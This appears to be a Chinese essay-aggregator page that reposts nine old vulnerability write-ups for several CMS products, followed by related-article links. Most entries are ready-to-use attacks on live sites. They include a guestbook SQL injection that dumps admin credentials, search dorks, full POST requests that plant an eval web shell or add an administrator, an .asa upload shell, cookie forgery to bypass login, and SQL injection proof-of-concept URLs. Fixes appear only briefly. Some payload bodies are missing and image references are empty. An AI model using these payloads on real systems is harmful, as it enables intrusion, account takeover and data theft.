帝国CMS 留言本多字节漏洞漏洞预警

时间:2023-04-15 07:30:33 其他范文 收藏本文 下载本文

帝国CMS 留言本多字节漏洞漏洞预警(通用9篇)由网友“DECA”投稿提供,以下是小编收集整理的帝国CMS 留言本多字节漏洞漏洞预警,欢迎阅读与借鉴。

帝国CMS 留言本多字节漏洞漏洞预警

篇1:帝国CMS 留言本多字节漏洞漏洞预警

作者:深灰

找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1

出来的是帝国CMS的留言本,在姓名处写:\\

联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from

phome_enewsuser where userid=1),1,1,1,0,0,0)/*

提交后爆出账号密码

篇2:帝国CMS后台密码重置漏洞漏洞预警

5.0及以前版本:用phpmyadmin修改phome_enewsuser表,把password字段的值设为:e10adc3949ba59abbe56e057f20f883e

密码就是:123456

5.1版本:用phpmyadmin修改phome_enewsuser表里的记录:把password字段的值设为:“322d3fef02fc39251436cb4522d29a71”;把salt字段的值设为:“abc”.

密码就是:123456

篇3:帝国cms 7.0 后台拿shell漏洞预警

帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码,

进入后台~!

方法一:系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:

“导入系统模型”,可进入“LoadInM.php”页面,如图:

在本地新建一个文件,文本内容为

再命名为1.php.mod,导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件,

可以从导入系统模型源文件中查看到,如图:

方法二:

在本地新建一个info.php(任意php文件)其源码内容为

再重名名为info.php.mod,将此文件按照方法一导入系统模型

即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:

info.php.mod的源码

然后

系统——备份与恢复数据——执行SQL语句在执行SQL语句框中输入如下代码:

即可在网站根目录生成 z.php 菜刀连接即可~!

篇4:餐厅cms getshell漏洞漏洞预警

漏洞类型:代码执行

关键字:inurl:index.php?m=shopcar

问题出在/install/index.php文件,在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。

<?phpif(file_exists(“../install.lock”)){header(“Location: ../”);//没有退出}//echo 'tst';exit;require_once(“init.php”);if(empty($_REQUEST['step']) || $_REQUEST['step']==1){

可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。

1、getshell(很危险)

if(empty($_REQUEST['step']) || $_REQUEST['step']==1){$smarty->assign(“step”,1);$smarty->display(“index.html”);}elseif($_REQUEST['step']==2){$mysql_host=trim($_POST['mysql_host']);$mysql_user=trim($_POST['mysql_user']);$mysql_pwd=trim($_POST['mysql_pwd']);$mysql_db=trim($_POST['mysql_db']);$tblpre=trim($_POST['tblpre']);$domain==trim($_POST['domain']);$str=“<?php \r\n”;$str.='define(“MYSQL_HOST”,“'.$mysql_host.'”);'.“\r\n”;$str.='define(“MYSQL_USER”,“'.$mysql_user.'”);'.“\r\n”;$str.='define(“MYSQL_PWD”,“'.$mysql_pwd.'”);'.“\r\n”;$str.='define(“MYSQL_DB”,“'.$mysql_db.'”);'.“\r\n”;$str.='define(“MYSQL_CHARSET”,“GBK”);'.“\r\n”;$str.='define(“TABLE_PRE”,“'.$tblpre.'”);'.“\r\n”;$str.='define(“DOMAIN”,“'.$domain.'”);'.“\r\n”;$str.='define(“SKINS”,“default”);'.“\r\n”;$str.='?>';file_put_contents(“../config/config.inc.php”,$str);//将提交的数据写入php文件

上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马

-----------post----------

POST /canting/install/index.php?m=index&step=2 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 126

mysql_host=test“);@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

---------post----------

但是这个方法很危险,将导致网站无法运行,

2、直接添加管理员

elseif($_REQUEST['step']==5){if($_POST){ require_once(”../config/config.inc.php“);$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);mysql_select_db(MYSQL_DB,$link);mysql_query(”SET NAMES “.MYSQL_CHARSET );mysql_query(”SET sql_mode=''“);$adminname=trim($_POST['adminname']);$pwd1=trim($_POST['pwd1']);$pwd2=trim($_POST['pwd2']);if(empty($adminname)){echo ”“;exit;}if(($pwd1!=$pwd2) or empty($pwd1)){echo ”“;//这里也是没有退出}mysql_query(”insert into “.TABLE_PRE.”admin(adminname,password,isfounder) values('$adminname','“.umd5($pwd1).”',1)“);//直接可以插入一个管理员}

这样的话我们就可以直接插入一个管理员帐号,语句如下:

POST /canting/install/index.php?m=index&step=5 HTTP/1.1

Host: 192.168.80.129

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: 192.168.80.129/canting/install/index.php?step=1

Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42

Content-Type: application/x-www-form-urlencoded

Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen

篇5:帝国CMS(EmpireCMS)商品评分插件注入漏洞漏洞预警

由于对参数的变量未作初始化检测导致 pf\rate.php 和 pf\ratemovie.php 中变量 $id 存在注入风险,

$id=$_GET[''id''];$query=”SELECT infopfen,infopfennum FROM phome_ecms_shop WHERE id=$id“;$result=mysql_query($query);$v=$_GET[''v''];$id=$_GET[''id''];$query=”UPDATE phome_ecms_shop SET infopfen = infopfen + $v,infopfennum = infopfennum+1 WHERE id=$id“;$result=mysql_query($query);$query=”SELECT infopfen,infopfennum FROM phome_ecms_shop WHERE id=$id“;

$result=mysql_query($query);

修复方案:

过滤

篇6:80After CMS V4 鸡肋上传漏洞漏洞预警

By:小A

官方网址:www.reaft.com/

Cms下载地址:www.reaft.com/html/1/200.html

界面做的还不错,搜索了一下好像用的人很少,开始,

首先看目录下 UpLoad.html 文件上传,调用了的是 UpLoad.asp。

UpLoad.asp:

文件上传

<%

dim upload

set upload = new AnUpLoad

upload.Exe = ”*“

upload.MaxSize = 4 * 1024 * 1024 '4M

upload.GetData

if upload.ErrorID>0 then

response.Write upload.Description

else

postMess(”images/operate_02.jpg“)

dim savpath

savepath = ”/upload/“&year(date())&”/“&month(date())&”/“

for each f in upload.files(-1)

dim file

set file = upload.files(f)

if not(file is nothing) then

if file.saveToFile(savepath,0,true) then

postMess(”images/operate_01.jpg“)

postValue = postValue&”“&savepath&file.filename&”|“

response.write (”“)

end if

end if

set file = nothing

next

end if

set upload = nothing

%>

然后在来看看:UpLoad_Class.vbs.asp。

UpLoad_Class.vbs.asp:

<%

'=========================================================

'类名: AnUpLoad(艾恩无组件上传类)

'=========================================================

C省略N行代码

Public Function GetWH()

'本函数代码参考网络

On Error Resume Next

mvarExtend = lcase(mvarExtend)

if instr(”|jpg|jpeg|bmp|png|gif|asa|“,”|“ & mvarExtend & ”|“)<=0 then exit function

Dim m_binItem

Set m_binItem =server.CreateObject(”ADODB.Stream“)

m_binItem.Mode = 3

m_binItem.Type = 1

m_binItem.Open

Dim Info

Set Info = server.CreateObject(”ADODB.Recordset“)

Info.Fields.Append ”value“, 205, -1

Info.Open

Info.AddNew

Info(”value“).AppendChunk (mvarValue)

m_binItem.Write (Info(”value“))

Info(”value“).AppendChunk (Null)

Info.Update

Info.Close

Set Info = Nothing

select case lcase(mvarExtend)

case ”jpg“,”jpeg“

m_binItem.Position=3

do while not m_binItem.EOS

do

intTemp = Ascb(m_binItem.Read(1))

loop while intTemp = 255 and not m_binItem.EOS

if intTemp < 192 or intTemp >195 then

m_binItem.read(Bin2Val(m_binItem.Read(2))-2)

else

Exit do

end if

do

intTemp = Ascb(m_binItem.Read(1))

loop while intTemp < 255 and not m_binItem.EOS

loop

m_binItem.Read(3)

mvarHeight = Bin2Val(m_binItem.Read(2))

mvarWidth = Bin2Val(m_binItem.Read(2))

case ”gif“

if Lcase(strFext)”gif“ then strFext=”gif“

m_binItem.Position=6

mvarWidth = BinVal2(m_binItem.Read(2))

mvarHeight = BinVal2(m_binItem.Read(2))

case ”png“

if Lcase(strFext)”png“ then strFext=”png“

m_binItem.Position=18

mvarWidth = Bin2Val(m_binItem.Read(2))

m_binItem.Read(2)

mvarHeight = Bin2Val(m_binItem.Read(2))

case ”bmp“

if Lcase(strFext)”bmp“ then strFext=”bmp“

m_binItem.Position=18

mvarWidth = BinVal2(m_binItem.Read(4))

mvarHeight = BinVal2(m_binItem.Read(4))

case ”asa“

if Lcase(strFext)”asa“ then strFext=”asa“

m_binItem.Position=18

mvarWidth = BinVal2(m_binItem.Read(2))

mvarHeight = BinVal2(m_binItem.Read(2))

end select

m_binItem.Close

If err then

mException=Err.Description

End If

End Function

看红色部分,其他就不解释了,

直接上传asa拿shell。

还有就是上传可能会提示登录,直接伪造session就可以通过了。(站长评论:什么、?伪造 Session???……我了个擦,这要是能伪造,那岂不、、、小A同学可能是看错了,当成了cookie ……)

验证代码在 admin.asp。

admin.asp:

<%

if session(”username“)=”“ and session(”password“)=”“ then

session(”Errortxt“)=”登录超时,请重新登陆“

response.Redirect(”login.asp“)

response.end

end if

%>

其他就不多说了!

重新编辑了一下,第一次发贴,格式不对,请见谅。

这个应该算是一个漏洞吧,不知道是不是作者故意加上的,在上传扩展名,检查那里,居然加了个asa,无意间发现的。

篇7:phpaa cms 0day及修复漏洞预警

Author:BlAck.Eagle

cookie欺骗

漏洞文件:/admin/global.php

/**

* 后台公用配置文件

*

* 用于后台应用初始化、后台权限验证 等

*/

require_once '../data/config.inc.php'; //系统初始化文件

require_once '../include/function.admin.php'; //后台公用函数库

//后台登陆验证

if (!isset($_COOKIE['userid']) empty($_COOKIE['userid'])){ //程序员只是判断了 userid是否存在,当然可以绕过,

phpaa cms 0day及修复漏洞预警

防范的话就是session验证或者生成随机数的cookie

setcookie(lastURL,get_url());//上次访问地址

header(”Location: login.php“);

}

?>

利用方式:通过cookie&&sqlinjection工具伪造userid=任意值。然后访问/admin/index.php即可进入后台

修复方案:

进行session验证或者生成随机数的cookie

篇8:骑士CMS SQL注入漏洞漏洞预警

骑士CMS人才系统,ajax_output.php页面参数过滤不严存在SQL注入漏洞,

漏洞文件:ajax_output.php

$category_id=trim($_GET['category_id']);  if (($category_id+0)>0 && intval($category_id)==$category_id) //只用了if判断并没有执行

EXP:

127.0.0.1/74cms/ajax_output.php?act=index_jobscategory&category_id=4

漏洞修补:

$category_id=intval(trim($_GET['category_id']));

篇9:Alcassofts SOPHIA CMS SQL注入漏洞漏洞预警

Alcassoft's SOPHIA是一款国际化、功能强大的内容管理系统,Alcassoft's SOPHIA中的dsp_page.cfm文件存在sql注入漏洞,可能导致敏感信息泄露。

Title   : Alcassoft's SOPHIA CMS Vulnerable to SQL Injection

Found by: p0pc0rn 24/02/2011

Web       : www.alcassoft.com/site/

Dork   : intext:”Powered by Alcassoft SOPHIA"

[+]poc:

~~~~~~~~~

site.com/path/dsp_page.cfm?pageid=[SQL]

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警

齐博CMS验证码美化教程

Linux Kiss Server lks.c文件多个格式串处理漏洞

CMSZERO企业网站管理系统功能介绍

ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复

dedecms 补出来的一个鸡肋漏洞漏洞预警

国内CMS现状――带着垃圾站思想的CMS

AWStats 6.4及以下版本多个漏洞以及分析

LNK文件漏洞简要分析

Podcast Generator多个模块文件包含和任意文件删除漏洞

帝国CMS 留言本多字节漏洞漏洞预警
《帝国CMS 留言本多字节漏洞漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【帝国CMS 留言本多字节漏洞漏洞预警(通用9篇)】相关文章:

Manhali v1.8本地文件包含缺陷及修复2022-08-19

WordPress博客常用的两个调用缩略图的方法2023-06-30

opera9.52使用ajax读取本地文件漏洞进一步利用漏洞预警2023-04-03

IOS LPD远程缓冲区溢出漏洞2022-04-30

Linux Kernel ELF文件跨区域映射本地拒绝服务漏洞2023-09-01

Bambook某频道SQL注射漏洞及修复2022-08-31

对PHP的CMS程序的一些建议和看法2022-09-17

数据相关的口号2022-08-20

Samba nmbdpackets.c NetBIOS 回复栈有溢出漏洞2022-04-30

脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警2023-07-12